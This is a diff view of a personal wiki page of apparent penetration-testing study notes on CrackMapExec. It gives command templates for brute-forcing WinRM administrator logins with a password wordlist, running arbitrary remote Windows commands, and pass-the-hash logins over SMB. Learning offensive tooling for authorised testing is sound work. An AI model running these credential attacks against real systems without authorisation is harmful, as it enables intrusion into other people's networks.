The gMan nixWiki

Because the mind is made of Teflon...

User Tools

Site Tools

You are here: start » cme
cme

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision		Previous revision
cme [2024/02/04 01:58] gmancme [2024/02/04 02:08] (current) – [CME & WinRM] gman
Line 4: Line 4:
   * CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.    * CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. 
   * Built with stealth in mind, CME follows the concept of “Living off the Land”: abusing built-in Active Directory features/protocols to achieve it’s functionality and allowing it to evade most endpoint protection/IDS/IPS solutions.   * Built with stealth in mind, CME follows the concept of “Living off the Land”: abusing built-in Active Directory features/protocols to achieve it’s functionality and allowing it to evade most endpoint protection/IDS/IPS solutions.
 +  * See the [[https://ptestmethod.readthedocs.io/en/latest/cme.html | documentation]] for other help and examples.
  
 **Supported Protocols:** WinRM, MSSQL, SMB, SSH **Supported Protocols:** WinRM, MSSQL, SMB, SSH
Line 15: Line 16:
 </code> </code>
  
-**General Syntax:** ''crackmapexec <protocol> <target(s)> -u username -p password'' +**General Syntax:**
-  * Examples: +
-    * ''crackmapexec <protocol> <target(s)> -u username -p 'Admin!123@'''    or... +
-    * ''crackmapexec <protocol> <target(s)> -u='username' -p='Admin!123@''' +
-• See the [[https://ptestmethod.readthedocs.io/en/latest/cme.html | documentation]] for other help and examples.+
  
 +<code>
 +crackmapexec <protocol> <target(s)> -u username -p password
 +</code>
 +
 +**Examples:**
 +
 +<code>
 +crackmapexec <protocol> <target(s)> -u username -p 'Admin!123@' # or...
 +crackmapexec <protocol> <target(s)> -u='username' -p='Admin!123@'
 +</code>
 +
 +===== CME & WinRM =====
 +
 +**Syntax:**
 +
 +<code>
 +crackmapexec winrm [target ip] -u administrator -p /usr/share/.../unix_passwords.txt
 +</code>
 +
 +You can use the ''-u'' switch to specify a file of possible user names to try.
 +  * But, if we can get into the admin account, we don't have to do priv esc (so we test with one username, "administrator," first).
 +  * You should get a green "**[+]**" if successful.
 +
 +Look over the output (from the top down): 
 +  * First line: you can see it actually connects to WinRM.
 +  * NOTE: wsman is an implementation of WinRM: windows management.
 +
 +**Execute Commands:** If you successfully found login credentials, you can crackmapexec to execute arbitrary Windows commands on the target machine. Syntax:
 +
 +<code>
 +crackmapexec winrm [target ip] -u administrator -p [password]-x "whoami"
 +crackmapexec winrm [target ip] -u administrator -p [password] -x "systeminfo"
 +</code>
 +
 +You should get some happy feedback along with the results of your command execution.
 +  * ''systeminfo'' (Windows) takes a while to run but provides a lot of information about your target system.
 +
 +===== CME & Pass-the-Hash =====
 +
 +<code>
 +crackmapexec smb [target ip] -u Administrator -H "[administrator ntlm hash; copy-paste]"
 +</code>
 +
 +This should indicated whether or not it works. 
 +  * If you get a green **[+]** and **(Pwn3d!)** then it works and you can try the execution of commands on the system...
 +
 +<code>
 +crackmapexec smb [target ip] -u Administrator -H "[administrator ntlm hash; copy-paste]" -x "ipconfig"
 +</code> 
 +
 +It should give you visual feedback about the command execution. And there you go. Execute what you want.
 +
 +
 +
 +
 +----
  
cme.1707011935.txt.gz · Last modified: by gman